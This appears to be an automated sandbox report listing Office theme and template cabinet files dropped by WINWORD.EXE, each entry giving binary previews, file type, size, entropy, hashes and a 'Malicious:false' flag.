                                                      Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):46413
                                                      Entropy (8bit):7.9071408623961394
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                      SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                      SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                      SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):42788
                                                      Entropy (8bit):7.89307894056
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                      SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                      SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                      SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):276650
                                                      Entropy (8bit):7.995561338730199
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:84D8F3848E7424CBE3801F9570E05018
                                                      SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                      SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                      SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):271273
                                                      Entropy (8bit):7.995547668305345
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                      SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                      SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                      SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):295527
                                                      Entropy (8bit):7.996203550147553
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                      SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                      SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                      SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):261258
                                                      Entropy (8bit):7.99541965268665
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                      SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                      SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                      SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):307348
                                                      Entropy (8bit):7.996451393909308
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:0EBC45AA0E67CC435D0745438371F948
                                                      SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                      SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                      SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):222992
                                                      Entropy (8bit):7.994458910952451
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                      SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                      SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                      SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):230916
                                                      Entropy (8bit):7.994759087207758
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                      SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                      SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                      SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):550906
                                                      Entropy (8bit):7.998289614787931
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:1C12315C862A745A647DAD546EB4267E
                                                      SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                      SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                      SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):723359
                                                      Entropy (8bit):7.997550445816903
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                      SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                      SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                      SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):640684
                                                      Entropy (8bit):7.99860205353102
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                      SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                      SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                      SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):698244
                                                      Entropy (8bit):7.997838239368002
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:E29CE2663A56A1444EAA3732FFB82940
                                                      SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                      SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                      SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):953453
                                                      Entropy (8bit):7.99899040756787
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                      SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                      SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                      SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                      Malicious:false
                                                      Reputation:unknown
